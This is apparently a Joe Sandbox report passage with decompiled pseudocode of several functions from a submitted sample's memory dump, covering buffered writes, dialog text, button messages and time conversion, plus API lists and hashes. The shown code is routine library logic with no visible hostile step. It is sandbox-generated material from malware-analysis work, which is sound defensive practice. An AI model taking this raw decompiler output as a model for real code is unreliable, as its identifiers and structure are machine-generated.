      								_t81 =  *(_t96 + 0xc) & 0x00000108;
      								__eflags = _t81;
      								if(_t81 == 0) {
      									L18:
      									__eflags = _t78 - _v12;
      									if(_t78 < _v12) {
      										_t65 = E00AB4B9D(_t88, _t93,  *_v8, _t96);
      										__eflags = _t65 - 0xffffffff;
      										if(_t65 == 0xffffffff) {
      											L34:
      											_t66 = _t93;
      											L35:
      											return (_t66 - _t78) / _a8;
      										}
      										_v8 = _v8 + 1;
      										_t69 =  *(_t96 + 0x18);
      										_t78 = _t78 - 1;
      										_v12 = _t69;
      										__eflags = _t69;
      										if(_t69 <= 0) {
      											_v12 = 1;
      										}
      										goto L31;
      									}
      									__eflags = _t81;
      									if(_t81 == 0) {
      										L21:
      										__eflags = _v12;
      										_t94 = _t78;
      										if(_v12 != 0) {
      											_t72 = _t78;
      											_t88 = _t72 % _v12;
      											_t94 = _t94 - _t72 % _v12;
      											__eflags = _t94;
      										}
      										_push(_t94);
      										_push(_v8);
      										_push(E00AB2CD9(_t96));
      										_t71 = E00AB57C1(_t78, _t88, _t94, _t96, __eflags);
      										_t97 = _t97 + 0xc;
      										__eflags = _t71 - 0xffffffff;
      										if(_t71 == 0xffffffff) {
      											L36:
      											 *(_t96 + 0xc) =  *(_t96 + 0xc) | 0x00000020;
      											_t66 = _v16;
      											goto L35;
      										} else {
      											_t85 = _t94;
      											__eflags = _t71 - _t94;
      											if(_t71 <= _t94) {
      												_t85 = _t71;
      											}
      											_v8 = _v8 + _t85;
      											_t78 = _t78 - _t85;
      											__eflags = _t71 - _t94;
      											if(_t71 < _t94) {
      												goto L36;
      											} else {
      												L27:
      												_t93 = _v16;
      												goto L31;
      											}
      										}
      									}
      									_t74 = E00AAC172(_t88, _t96);
      									__eflags = _t74;
      									if(_t74 != 0) {
      										goto L34;
      									}
      									goto L21;
      								}
      								_t75 =  *(_t96 + 4);
      								__eflags = _t75;
      								if(__eflags == 0) {
      									goto L18;
      								}
      								if(__eflags < 0) {
      									_t45 = _t96 + 0xc;
      									 *_t45 =  *(_t96 + 0xc) | 0x00000020;
      									__eflags =  *_t45;
      									goto L34;
      								}
      								_t95 = _t78;
      								__eflags = _t78 - _t75;
      								if(_t78 >= _t75) {
      									_t95 = _t75;
      								}
      								E00AAB080( *_t96, _v8, _t95);
      								 *(_t96 + 4) =  *(_t96 + 4) - _t95;
      								 *_t96 =  *_t96 + _t95;
      								_t97 = _t97 + 0xc;
      								_t78 = _t78 - _t95;
      								_v8 = _v8 + _t95;
      								goto L27;
      								L31:
      								__eflags = _t78;
      							} while (_t78 != 0);
      							goto L32;
      						}
      					}
      					L3:
      					 *((intOrPtr*)(E00AADB06(_t100))) = 0x16;
      					E00AB4B8D();
      					goto L4;
      				}
      			}
      0x00aac4ce
      0x00aac4d3
      0x00aac4f2
      0x00000000
      0x00aac4db
      0x00aac4db
      0x00aac4de
      0x00aac4e0
      0x00aac4f9
      0x00aac4fc
      0x00aac4fe
      0x00000000
      0x00000000
      0x00aac500
      0x00aac505
      0x00aac507
      0x00aac50a
      0x00000000
      0x00000000
      0x00aac50c
      0x00aac510
      0x00aac517
      0x00aac51a
      0x00aac51d
      0x00aac51f
      0x00aac529
      0x00aac521
      0x00aac524
      0x00aac524
      0x00aac530
      0x00aac532
      0x00aac5f7
      0x00000000
      0x00aac538
      0x00aac538
      0x00aac53b
      0x00aac53b
      0x00aac541
      0x00aac572
      0x00aac572
      0x00aac575
      0x00aac5ce
      0x00aac5d5
      0x00aac5d8
      0x00aac603
      0x00aac603
      0x00aac605
      0x00000000
      0x00aac609
      0x00aac5da
      0x00aac5dd
      0x00aac5e0
      0x00aac5e1
      0x00aac5e4
      0x00aac5e6
      0x00aac5e8
      0x00aac5e8
      0x00000000
      0x00aac5e6
      0x00aac577
      0x00aac579
      0x00aac586
      0x00aac586
      0x00aac58a
      0x00aac58c
      0x00aac590
      0x00aac592
      0x00aac595
      0x00aac595
      0x00aac595
      0x00aac597
      0x00aac598
      0x00aac5a2
      0x00aac5a3
      0x00aac5a8
      0x00aac5ab
      0x00aac5ae
      0x00aac611
      0x00aac611
      0x00aac615
      0x00000000
      0x00aac5b0
      0x00aac5b0
      0x00aac5b2
      0x00aac5b4
      0x00aac5b6
      0x00aac5b6
      0x00aac5b8
      0x00aac5bb
      0x00aac5bd
      0x00aac5bf
      0x00000000
      0x00aac5c1
      0x00aac5c1
      0x00aac5c1
      0x00000000
      0x00aac5c1
      0x00aac5bf
      0x00aac5ae
      0x00aac57c
      0x00aac582
      0x00aac584
      0x00000000
      0x00000000
      0x00000000
      0x00aac584
      0x00aac543
      0x00aac546
      0x00aac548
      0x00000000
      0x00000000
      0x00aac54a
      0x00aac5ff
      0x00aac5ff
      0x00aac5ff
      0x00000000
      0x00aac5ff
      0x00aac550
      0x00aac552
      0x00aac554
      0x00aac556
      0x00aac556
      0x00aac55e
      0x00aac563
      0x00aac566
      0x00aac568
      0x00aac56b
      0x00aac56d
      0x00000000
      0x00aac5ef
      0x00aac5ef
      0x00aac5ef
      0x00000000
      0x00aac538
      0x00aac532
      0x00aac4e2
      0x00aac4e7
      0x00aac4ed
      0x00000000
      0x00aac4ed

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: __flsbuf__flush__getptd_noexit__write_memmove
      • String ID:
      • API String ID: 2782032738-0
      • Opcode ID: ed205facf0757f7a0708fa11dc88b4ffc7fe014ae8c8f429d2f0d019333c6636
      • Instruction ID: 70aa6a80465b407952775a678e9adf8f420ea4fbd7962be0dfb4ac66619185f9
      • Opcode Fuzzy Hash: ed205facf0757f7a0708fa11dc88b4ffc7fe014ae8c8f429d2f0d019333c6636
      • Instruction Fuzzy Hash: 1641B631E00705DBEB28DFA9C9546AEBBB5AF82370F248529E455975C1E770EE41CB40
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 97%
      			E009A8C8F(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
      				intOrPtr _t34;
      				struct HWND__* _t37;
      				signed int _t38;
      				void* _t66;
      				short* _t68;
      				struct HWND__** _t70;
      				void* _t71;
      				struct HWND__** _t75;
      				intOrPtr _t77;
      
      				_t66 = __edx;
      				_push(0x10c);
      				E00AAD29B(0xac7d2f, __ebx, __edi, __esi);
      				_t70 =  *(_t71 + 0xc);
      				_t34 =  *((intOrPtr*)(_t71 + 0x10));
      				_t75 = _t70;
      				_t57 = 0 | _t75 != 0x00000000;
      				 *((intOrPtr*)(_t71 - 0x118)) = _t34;
      				if(_t75 != 0) {
      					L2:
      					_t77 = _t34;
      					_t57 = 0 | _t77 != 0x00000000;
      					if(_t77 != 0) {
      						goto L1;
      					}
      					E009A5D70(_t71 - 0x114, _t66, E009B9D52());
      					_t60 = _t70[2];
      					_t37 = _t70[1];
      					_t68 = 0xfffffdf8;
      					 *((intOrPtr*)(_t71 - 4)) = 0;
      					if(_t60 != 0xfffffdf8 || (_t70[0x19] & 0x00000001) == 0) {
      						if(_t60 != 0xfffffdee || (_t70[0x2d] & 0x00000001) == 0) {
      							goto L8;
      						} else {
      							goto L7;
      						}
      					} else {
      						L7:
      						_t37 = GetDlgCtrlID(_t37);
      						L8:
      						if(_t37 == 0) {
      							L12:
      							if(_t70[2] != _t68) {
      								_t68 =  &(_t70[4]);
      								_t38 = MultiByteToWideChar(3, 0,  *(_t71 - 0x114), 0xffffffff, _t68, 0x50);
      								if(_t68 != 0 && _t38 > 0x50) {
      									_t38 = E009A54F0(0, _t60, _t66, _t68, _t70, 0x80004005);
      								}
      								if(_t38 > 0 && _t68 != 0) {
      									 *((short*)(_t68 + _t38 * 2 - 2)) = 0;
      								}
      							} else {
      								E009A6677(_t60, E00AAD17D( &(_t70[4]), 0x50,  *(_t71 - 0x114), 0xffffffff));
      							}
      							 *((intOrPtr*)( *((intOrPtr*)(_t71 - 0x118)))) = 0;
      							SetWindowPos( *_t70, 0, 0, 0, 0, 0, 0x213);
      							E009A5510( &(( *(_t71 - 0x114))[0xfffffffffffffff0]), _t66);
      							L21:
      							return E00AAD31E(0, _t68, _t70);
      						}
      						_t60 = _t71 - 0x110;
      						if(E009BE4C2(0, _t71 - 0x110, _t68, _t70, _t37, _t71 - 0x110, 0x100) != 0) {
      							E009BE527(0, _t71 - 0x114, _t71 - 0x110, 1, 0xa);
      							goto L12;
      						}
      						E009A5510( &(( *(_t71 - 0x114))[0xfffffffffffffff0]), _t66);
      						goto L21;
      					}
      				}
      				L1:
      				_t34 = E009B8782(_t57);
      				goto L2;
      			}

      0x009a8c8f
      0x009a8c8f
      0x009a8c99
      0x009a8c9e
      0x009a8ca1
      0x009a8ca8
      0x009a8caa
      0x009a8cad
      0x009a8cb5
      0x009a8cbc
      0x009a8cbe
      0x009a8cc0
      0x009a8cc5
      0x00000000
      0x00000000
      0x009a8cd3
      0x009a8cd8
      0x009a8cdb
      0x009a8cde
      0x009a8ce3
      0x009a8ce8
      0x009a8cf6
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009a8d01
      0x009a8d01
      0x009a8d02
      0x009a8d08
      0x009a8d0a
      0x009a8d4e
      0x009a8d51
      0x009a8d73
      0x009a8d82
      0x009a8d8a
      0x009a8d96
      0x009a8d96
      0x009a8d9d
      0x009a8da5
      0x009a8da5
      0x009a8d53
      0x009a8d67
      0x009a8d6c
      0x009a8dba
      0x009a8dbe
      0x009a8dcd
      0x009a8dd5
      0x009a8dda
      0x009a8dda
      0x009a8d11
      0x009a8d20
      0x009a8d49
      0x00000000
      0x009a8d49
      0x009a8d2b
      0x00000000
      0x009a8d30
      0x009a8ce8
      0x009a8cb7
      0x009a8cb7
      0x00000000

      APIs
      • __EH_prolog3_GS.LIBCMT ref: 009A8C99
      • GetDlgCtrlID.USER32 ref: 009A8D02
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      • MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,?,00000050,00000000,0000010C), ref: 009A8D82
      • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000213), ref: 009A8DBE
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ByteCharCtrlException@8H_prolog3_MultiThrowWideWindow
      • String ID:
      • API String ID: 2836953783-0
      • Opcode ID: 52587d47c07a23adcbcd6520720398f5fb1e5ae4e2a931d1445d2fff50350719
      • Instruction ID: 761fc7accce9172c1703eb8aa219acb54298707a95df70ade60001343d53cb68
      • Opcode Fuzzy Hash: 52587d47c07a23adcbcd6520720398f5fb1e5ae4e2a931d1445d2fff50350719
      • Instruction Fuzzy Hash: 1D31E871A006199BCF249BB48D86BEF73ACAF56310F100A6DF657A71D0DF709D80CAA1
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 100%
      			E00AC021F(void* __edx, void* __edi, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
      				char _v8;
      				signed int _v12;
      				char _v20;
      				char _t43;
      				char _t46;
      				signed int _t53;
      				signed int _t54;
      				intOrPtr _t56;
      				int _t57;
      				int _t58;
      				char _t59;
      				short* _t60;
      				int _t65;
      				char* _t74;
      
      				_t74 = _a8;
      				if(_t74 == 0 || _a12 == 0) {
      					L5:
      					return 0;
      				} else {
      					if( *_t74 != 0) {
      						E00AAD02F( &_v20, __edx, __edi, _a16);
      						_t43 = _v20;
      						__eflags =  *(_t43 + 0x14);
      						if( *(_t43 + 0x14) != 0) {
      							_t46 = E00ABC6B2( *_t74 & 0x000000ff,  &_v20);
      							__eflags = _t46;
      							if(_t46 == 0) {
      								__eflags = _a4;
      								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t74, 1, _a4, 0 | _a4 != 0x00000000);
      								if(__eflags != 0) {
      									L10:
      									__eflags = _v8;
      									if(_v8 != 0) {
      										_t53 = _v12;
      										_t11 = _t53 + 0x70;
      										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
      										__eflags =  *_t11;
      									}
      									return 1;
      								}
      								L21:
      								_t54 = E00AADB06(__eflags);
      								 *_t54 = 0x2a;
      								__eflags = _v8;
      								if(_v8 != 0) {
      									_t54 = _v12;
      									_t33 = _t54 + 0x70;
      									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
      									__eflags =  *_t33;
      								}
      								return _t54 | 0xffffffff;
      							}
      							_t56 = _v20;
      							_t65 =  *(_t56 + 0xac);
      							__eflags = _t65 - 1;
      							if(_t65 <= 1) {
      								L17:
      								__eflags = _a12 -  *(_t56 + 0xac);
      								if(__eflags < 0) {
      									goto L21;
      								}
      								__eflags = _t74[1];
      								if(__eflags == 0) {
      									goto L21;
      								}
      								L19:
      								_t57 =  *(_t56 + 0xac);
      								__eflags = _v8;
      								if(_v8 == 0) {
      									return _t57;
      								}
      								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
      								return _t57;
      							}
      							__eflags = _a12 - _t65;
      							if(_a12 < _t65) {
      								goto L17;
      							}
      							__eflags = _a4;
      							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t74, _t65, _a4, 0 | _a4 != 0x00000000);
      							__eflags = _t58;
      							_t56 = _v20;
      							if(_t58 != 0) {
      								goto L19;
      							}
      							goto L17;
      						}
      						_t59 = _a4;
      						__eflags = _t59;
      						if(_t59 != 0) {
      							 *_t59 =  *_t74 & 0x000000ff;
      						}
      						goto L10;
      					} else {
      						_t60 = _a4;
      						if(_t60 != 0) {
      							 *_t60 = 0;
      						}
      						goto L5;
      					}
      				}
      			}

      0x00ac0229
      0x00ac0230
      0x00ac0247
      0x00000000
      0x00ac0237
      0x00ac0239
      0x00ac0253
      0x00ac0258
      0x00ac025b
      0x00ac025e
      0x00ac0286
      0x00ac028d
      0x00ac028f
      0x00ac0310
      0x00ac032b
      0x00ac032d
      0x00ac026d
      0x00ac026d
      0x00ac0270
      0x00ac0272
      0x00ac0275
      0x00ac0275
      0x00ac0275
      0x00ac0275
      0x00000000
      0x00ac027b
      0x00ac02ef
      0x00ac02ef
      0x00ac02f4
      0x00ac02fa
      0x00ac02fd
      0x00ac02ff
      0x00ac0302
      0x00ac0302
      0x00ac0302
      0x00ac0302
      0x00000000
      0x00ac0306
      0x00ac0291
      0x00ac0294
      0x00ac029a
      0x00ac029d
      0x00ac02c4
      0x00ac02c7
      0x00ac02cd
      0x00000000
      0x00000000
      0x00ac02cf
      0x00ac02d2
      0x00000000
      0x00000000
      0x00ac02d4
      0x00ac02d4
      0x00ac02da
      0x00ac02dd
      0x00ac024c
      0x00ac024c
      0x00ac02e6
      0x00000000
      0x00ac02e6
      0x00ac029f
      0x00ac02a2
      0x00000000
      0x00000000
      0x00ac02a6
      0x00ac02b7
      0x00ac02bd
      0x00ac02bf
      0x00ac02c2
      0x00000000
      0x00000000
      0x00000000
      0x00ac02c2
      0x00ac0260
      0x00ac0263
      0x00ac0265
      0x00ac026a
      0x00ac026a
      0x00000000
      0x00ac023b
      0x00ac023b
      0x00ac0240
      0x00ac0244
      0x00ac0244
      0x00000000
      0x00ac0240
      0x00ac0239

      APIs
      • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00AC0253
      • __isleadbyte_l.LIBCMT ref: 00AC0286
      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,?,?,00000000,?,?,?), ref: 00AC02B7
      • MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000,?,?,?), ref: 00AC0325
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
      • String ID:
      • API String ID: 3058430110-0
      • Opcode ID: 588133b2cc40322731b5825e9eecc4a3ef0924a44e1c789ae64c91246a3eb8e2
      • Instruction ID: 07b4547c97bca9566f2cd1ef24c30db00971d87dc63a947971caeeba1b561e76
      • Opcode Fuzzy Hash: 588133b2cc40322731b5825e9eecc4a3ef0924a44e1c789ae64c91246a3eb8e2
      • Instruction Fuzzy Hash: FE317C31A01295EFDB20DFA4C889FEE3BB5AF01311F1A856DE6659B191D730DD80DB50
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 97%
      			E009B1011(long* __ecx, long _a4) {
      				long* _v8;
      				void* __ebp;
      				long* _t26;
      				long _t27;
      				struct HWND__** _t33;
      				struct HWND__** _t35;
      				long* _t36;
      
      				_t36 = __ecx;
      				_push(__ecx);
      				_v8 = __ecx;
      				if(__ecx[0x1a] != 0) {
      					_t33 = _a4;
      					if(_t33 != 0) {
      						if(_t33[2] == 0) {
      							L5:
      							_t38 = _t36[0x1a] + 0x40;
      							_t26 = E009BBD4F(_t36[0x1a] + 0x40, _t33, 0);
      							_v8 = _t26;
      							if(_t26 == 0) {
      								L6:
      								_t26 = E009B8782(_t38);
      							}
      							_t27 =  *_t26;
      							if(_t27 == 0) {
      								L15:
      								_t25 = _v8[1];
      								if(_t25 != 0) {
      									while(_t25 != 0) {
      										_t35 =  *(_t25 + 8);
      										_a4 =  *((intOrPtr*)(_t25 + 4));
      										if(_t35[2] == 0 || SendMessageA( *_t35, 0xf0, 0, 0) != 1) {
      											_t38 = _t35;
      											_t25 = E009B0CB1(_t25, _t35);
      											if((_t25 & 0x00020000) == 0) {
      												if(_a4 != 0) {
      													_t25 = _a4;
      													continue;
      												} else {
      												}
      											}
      										} else {
      											goto L24;
      										}
      										goto L25;
      									}
      									goto L6;
      								}
      							} else {
      								while(_t27 != 0) {
      									_t35 =  *(_t27 + 8);
      									_a4 =  *_t27;
      									_t38 = _t35;
      									if((E009B0CB1(_t27, _t35) & 0x00020000) != 0) {
      										goto L15;
      									} else {
      										if(_t35[2] == 0 || SendMessageA( *_t35, 0xf0, 0, 0) != 1) {
      											if(_a4 != 0) {
      												_t27 = _a4;
      												continue;
      											} else {
      												goto L15;
      											}
      										} else {
      											goto L24;
      										}
      									}
      									goto L25;
      								}
      								goto L6;
      							}
      						} else {
      							if(SendMessageA( *_t33, 0xf0, 0, 0) == 1) {
      								L24:
      								_t25 = SendMessageA( *_t35, 0xf1, 0, 0);
      							} else {
      								_t36 = _v8;
      								goto L5;
      							}
      						}
      						L25:
      					}
      				}
      				return _t25;
      			}

      0x009b1011
      0x009b1016
      0x009b101a
      0x009b1020
      0x009b1027
      0x009b102c
      0x009b103c
      0x009b1055
      0x009b105a
      0x009b105d
      0x009b1062
      0x009b1067
      0x009b1069
      0x009b1069
      0x009b1069
      0x009b106e
      0x009b1072
      0x009b10ad
      0x009b10b0
      0x009b10b5
      0x009b10bc
      0x009b10c0
      0x009b10c6
      0x009b10cc
      0x009b10de
      0x009b10e0
      0x009b10ea
      0x009b10ef
      0x009b10b9
      0x00000000
      0x00000000
      0x009b10f1
      0x009b10ef
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009b10cc
      0x00000000
      0x009b10bc
      0x009b1074
      0x009b1079
      0x009b107f
      0x009b1082
      0x009b1085
      0x009b1091
      0x00000000
      0x009b1093
      0x009b1096
      0x009b10ab
      0x009b1076
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x00000000
      0x009b1096
      0x00000000
      0x009b1091
      0x00000000
      0x009b1079
      0x009b103e
      0x009b104c
      0x009b10f3
      0x009b10fc
      0x009b1052
      0x009b1052
      0x00000000
      0x009b1052
      0x009b104c
      0x009b10fe
      0x009b10fe
      0x009b10ff
      0x009b1102

      APIs
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: MessageSend
      • String ID:
      • API String ID: 3850602802-0
      • Opcode ID: 5ef781777cb52fd579ec7bfa5f6a0dab838c852f61865c9d41d661e9871e6843
      • Instruction ID: 818450f81050e9dd19dc2d4e5162d69ce8cf1dffc14a51544908c7a3e59e6a2f
      • Opcode Fuzzy Hash: 5ef781777cb52fd579ec7bfa5f6a0dab838c852f61865c9d41d661e9871e6843
      • Instruction Fuzzy Hash: 48317830640244EFCB31EF09CAE5EEABBAEEBC5760F64416AE4058B255D671DDC0DB50
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 97%
      			E009D2F8C(intOrPtr __ebx, void* __ecx, intOrPtr __edx, intOrPtr _a4, struct _FILETIME* _a8) {
      				signed int _v8;
      				struct _SYSTEMTIME _v24;
      				struct _FILETIME _v32;
      				void* __edi;
      				void* __esi;
      				void* __ebp;
      				signed int _t15;
      				int _t26;
      				intOrPtr _t34;
      				intOrPtr _t44;
      				struct _FILETIME* _t45;
      				intOrPtr _t46;
      				signed int _t48;
      
      				_t44 = __edx;
      				_t34 = __ebx;
      				_t15 =  *0xd0c910; // 0x3a0e8b0c
      				_v8 = _t15 ^ _t48;
      				_t46 = _a4;
      				_t45 = _a8;
      				_t49 = _t45;
      				if(_t45 == 0) {
      					E009B8782(__ecx);
      				}
      				_v24.wYear = E009D2CF8(_t34, _t46, _t44, _t49);
      				_v24.wMonth = E009D2D2F(_t34, _t46, _t44, _t49);
      				_v24.wDay = E009D2D62(_t34, _t46, _t44, _t49);
      				_v24.wHour = E009D2D94(_t34, _t46, _t44, _t49);
      				_v24.wMinute = E009D2DC7(_t34, _t46, _t44, _t49);
      				_v24.wSecond = E009D2DFA(_t34, _t46, _t44, _t49);
      				_v24.wMilliseconds = 0;
      				_t26 = SystemTimeToFileTime( &_v24,  &_v32);
      				_t47 = GetLastError;
      				if(_t26 == 0) {
      					E009D38EF(_t34, _t44, _t45, GetLastError, GetLastError(), 0);
      				}
      				if(LocalFileTimeToFileTime( &_v32, _t45) == 0) {
      					_t28 = E009D38EF(_t34, _t44, _t45, _t47, GetLastError(), _t28);
      				}
      				return E00AAB46A(_t28, _t34, _v8 ^ _t48, _t44, _t45, _t47);
      			}

      0x009d2f8c
      0x009d2f8c
      0x009d2f94
      0x009d2f9b
      0x009d2f9f
      0x009d2fa3
      0x009d2fa6
      0x009d2fa8
      0x009d2faa
      0x009d2faa
      0x009d2fb8
      0x009d2fc3
      0x009d2fce
      0x009d2fd9
      0x009d2fe4
      0x009d2fed
      0x009d2ff3
      0x009d2fff
      0x009d3005
      0x009d300d
      0x009d3014
      0x009d3014
      0x009d3026
      0x009d302c
      0x009d302c
      0x009d303e

      APIs
      • SystemTimeToFileTime.KERNEL32(?,?,?,?), ref: 009D2FFF
      • GetLastError.KERNEL32(00000000,?,?), ref: 009D3011
      • LocalFileTimeToFileTime.KERNEL32(?,00001000,?,?), ref: 009D301E
      • GetLastError.KERNEL32(00000000,?,?), ref: 009D3029
        • Part of subcall function 009B8782: __CxxThrowException@8.LIBCMT ref: 009B8798
      Memory Dump Source
      • Source File: 00000000.00000002.245504697.00000000009A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
      • Associated: 00000000.00000002.245499068.00000000009A0000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245756146.0000000000AD6000.00000002.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245799041.0000000000B1E000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245964085.0000000000C5A000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245971843.0000000000C66000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245985069.0000000000C83000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.245991562.0000000000C8D000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246010185.0000000000CA2000.00000004.00000001.01000000.00000003.sdmp
      • Associated: 00000000.00000002.246065048.0000000000D16000.00000002.00000001.01000000.00000003.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_0_2_9a0000_cANdLlHS4N.jbxd
      Yara matches
      Similarity
      • API ID: Time$File$ErrorLast$Exception@8LocalSystemThrow
      • String ID:
      • API String ID: 3139533385-0
      • Opcode ID: 777c1377488c05401c4281bb9d4c9e04068574ab9a3b92d5821629d0447f78b6
      • Instruction ID: 4f76e7105d026e701198062c88ffe29df32f317419492ddf7cfa8593970ea017
      • Opcode Fuzzy Hash: 777c1377488c05401c4281bb9d4c9e04068574ab9a3b92d5821629d0447f78b6
      • Instruction Fuzzy Hash: 10119125E50258A7CF00FFF8C805A9E77BDAF98700B00C45BB801E7351EE309B0197A5
      Uniqueness

      Uniqueness Score: -1.00%

      C-Code - Quality: 95%
      			E009B210A(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
      				void* _t41;
      				intOrPtr _t48;
      				void* _t50;
      				intOrPtr* _t55;
      				void* _t56;
      				void* _t57;
      
      				_t57 = __eflags;
      				_t51 = __ecx;
      				_t49 = __ebx;
      				_push(4);
      				E00AAD232(0xac8229, __ebx, __edi, __esi);
      				_t55 = __ecx;
      				 *((intOrPtr*)(_t56 - 0x10)) = __ecx;
      				E009B2E7D(__ebx, __ecx, __edi, __ecx, _t57);
      				 *((intOrPtr*)(_t56 - 4)) = 0;
      				 *_t55 = 0xad912c;
      				_t58 =  *((intOrPtr*)(_t56 + 8));
      				if( *((intOrPtr*)(_t56 + 8)) == 0) {
      					 *((intOrPtr*)(_t55 + 0x50)) = 0;
      				} else {
      					_t48 = E00AAF4C4( *((intOrPtr*)(_t56 + 8)));
      					_pop(_t51);
      					 *((intOrPtr*)(_t55 + 0x50)) = _t48;
      				}
      				_t50 = E009BD77F(_t49, 0, _t55, _t58);
      				_t59 = _t50;
